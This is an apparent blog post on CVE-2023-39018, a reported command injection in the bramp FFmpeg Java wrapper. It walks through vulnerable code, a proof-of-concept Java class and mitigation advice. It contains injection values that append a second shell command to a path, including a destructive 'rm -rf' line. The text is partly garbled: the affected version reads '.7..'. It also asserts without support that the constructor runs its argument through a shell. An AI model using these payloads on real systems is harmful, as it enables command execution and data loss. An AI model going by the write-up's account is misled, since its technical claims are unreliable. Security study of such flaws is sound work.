CVE-2023-39018 - Code Injection in FFmpeg Java Wrapper (`net.bramp.ffmpeg.FFmpeg.<constructor>`) — Deep Dive, Exploit, and Mitigation

In 2023, security researchers discovered a critical vulnerability affecting the FFmpeg Java wrapper up to version .7.. This vulnerability, tracked as CVE-2023-39018, allows attackers to execute arbitrary code on hosts running vulnerable code, simply by passing unchecked arguments. If you're using libraries such as net.bramp.ffmpeg.FFmpeg in your Java projects, understanding and patching this flaw is urgent. In this post, we'll break down how the issue works, walk through a simple exploit, and link to authoritative references.

Vulnerability type: Code injection via command-line arguments (code injection)

- CVE: CVE-2023-39018

Root Cause: The problem is in the way FFmpeg constructor passes arguments directly to the underlying OS shell when constructing and launching processes. Malicious input isn't sanitized, letting an attacker inject extra commands.

A common usage of the library looks like this

import net.bramp.ffmpeg.FFmpeg;
...
FFmpeg ffmpeg = new FFmpeg("/usr/bin/ffmpeg");

You might think the path parameter is safe, but in vulnerable versions, if an attacker can supply or influence this argument, extra shell commands can slip through.

For example, vulnerable code might look like

String userProvidedPath = request.getParameter("ffmpeg_path");
FFmpeg ffmpeg = new FFmpeg(userProvidedPath);

If an attacker submits a path like

/usr/bin/ffmpeg; rm -rf /tmp/hacked

The code will spawn a process that runs /usr/bin/ffmpeg, then deletes everything inside /tmp/hacked.

Proof of Concept Exploit

Suppose you have a web application that allows a user to specify the path to ffmpeg via a form. With the following code:

String ffmpegPath = request.getParameter("ffmpeg_path");  // User controlled!
FFmpeg ffmpeg = new FFmpeg(ffmpegPath);

An attacker posts

/usr/bin/ffmpeg; touch /tmp/owned_by_cve_2023_39018

Result: Your server creates a file /tmp/owned_by_cve_2023_39018, showing arbitrary commands can run.

Demo Code

public class TestExploit {
    public static void main(String[] args) throws Exception {
        String injectedPath = "/usr/bin/ffmpeg; echo HACKED > /tmp/cve_2023_39018";
        FFmpeg ffmpeg = new FFmpeg(injectedPath);
        ffmpeg.version();  // This causes the command to execute
    }
}

After running, check for the file

cat /tmp/cve_2023_39018
# Output will show: HACKED

Why Is This Dangerous?

- Remote Code Execution (RCE): If user input reaches FFmpeg constructor, an attacker could run any command with the privileges of the Java application.
- Wide Impact: FFmpeg is used in video processing, transcoding, and media pipeline servers, often as backend services.

Official References

- CVE Database: NVD - CVE-2023-39018
- FFmpeg Java Wrapper Project: https://github.com/bramp/ffmpeg-cli-wrapper
- Related fix and discussions: Security advisory #147


## How To Fix / Mitigation

Hardcode the path to ffmpeg if possible.

- If configuration is needed, allow admins only and check for valid paths (e.g., using Files.exists() and regex to allow only expected binaries).

// Safe usage: only whitelist valid executable
String ffmpegPath = "/usr/bin/ffmpeg";
if (new File(ffmpegPath).exists()) {
    FFmpeg ffmpeg = new FFmpeg(ffmpegPath);
} else {
    throw new SecurityException("Invalid ffmpeg path");
}

Conclusion

CVE-2023-39018 is a serious code injection issue. The simplest way to stay secure is to update your dependencies immediately and restrict user-supplied arguments. If you develop or deploy video processing apps in Java, double-check your use of the FFmpeg CLI wrapper.

More Reading

- Secure Coding Guidelines - OWASP Command Injection
- ProcessBuilder and Runtime.exec() security
- Bramp FFmpeg CLI Wrapper Releases

Timeline

Published on: 07/28/2023 15:15:00 UTC
Last modified on: 08/03/2023 18:04:00 UTC